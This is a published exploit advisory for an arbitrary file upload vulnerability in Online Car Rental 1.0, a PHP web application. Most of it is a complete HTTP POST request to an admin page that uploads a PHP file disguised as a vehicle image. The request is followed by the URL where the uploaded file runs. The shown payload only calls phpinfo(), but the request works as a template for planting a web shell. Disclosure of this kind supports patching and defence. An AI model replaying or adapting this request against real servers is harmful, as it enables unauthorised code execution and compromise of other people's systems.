Online Car Rental version 1.0 suffers from a remote shell upload vulnerability.
16e7dbecfa2fc7c91e9c10a0ab80b747
# Exploit Title: Online Car Rental 1.0 | Arbitrary file upload
# Exploit Author: Richard Jones
# Date: 2021/09/02
# Vendor Homepage: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14145&title=Online+Car+Rental+System+Using+PHP%2FMySQL+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
POST /Online%20Car%20Rental/admin/post-avehical.php HTTP/1.1
Host: TARGETURL
Content-Type: multipart/form-data; boundary=---------------------------41518493223397502791049196241
Content-Length: 1819
Cookie: PHPSESSID=8ouf7h44qe55bk4eqai1p145o1
Upgrade-Insecure-Requests: 1
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="vehicletitle"
a
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="brandname"
2
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="vehicalorcview"
a
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="priceperday"
1
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="fueltype"
Petrol
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="modelyear"
1
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="seatingcapacity"
1
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img1"; filename="rev.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img2"; filename="Untitled.png"
Content-Type: image/png
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img3"; filename="Untitled.png"
Content-Type: image/png
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img4"; filename="Untitled.png"
Content-Type: image/png
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream
-----------------------------41518493223397502791049196241
Content-Disposition: form-data; name="submit"
-----------------------------41518493223397502791049196241--
# Call malicious file at: http://TARGETURL/Online%20Car%20Rental/admin/img/vehicleimages/rev.php